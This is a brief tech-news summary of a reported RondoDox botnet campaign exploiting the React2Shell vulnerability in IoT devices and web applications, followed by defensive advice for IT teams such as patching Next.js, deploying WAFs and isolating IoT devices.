Introduction
Cybersecurity researchers have uncovered an extensive nine-month campaign targeting IoT devices and web applications, orchestrated by a botnet named RondoDox. This botnet exploits the critical React2Shell vulnerability (CVE-2025-55182) to gain unauthorized access and execute remote code.

Key Details

• Who: Cybersecurity experts from CloudSEK.
• What: RondoDox botnet exploits vulnerabilities in devices, primarily using React2Shell for infiltration.
• When: Activity tracked from early 2025 to December 2025.
• Where: Affected devices primarily located in the U.S., Germany, France, and India, with over 90,000 instances still vulnerable as of late December 2025.
• Why: The RondoDox campaign highlights the urgency for organizations to reinforce their cybersecurity measures to prevent exploitation of high-risk vulnerabilities.
• How: It integrates into networks, deploying malware that targets both IoT devices and web servers, systematically escalating control and removing competing malware.

Why It Matters
This development poses significant risks to organizational cybersecurity and infrastructure management, impacting:

• Enterprise Security: Unpatched vulnerabilities can lead to unauthorized access and data breaches.
• Hybrid/Multi-Cloud Adoption: Exploits can affect services deployed across cloud architectures, hampering seamless integration and security.
• Server/Network Automation: Attacks may disrupt automated tasks, necessitating continuous monitoring and immediate patches.

Takeaway for IT Teams
Organizations must prioritize immediate updates to Next.js frameworks and implement Web Application Firewalls (WAFs). It’s crucial to isolate IoT devices within dedicated VLANs and actively monitor for unusual process executions to safeguard against similar threats.

Call-to-Action
For more curated news and infrastructure insights, visit TrendInfra.com.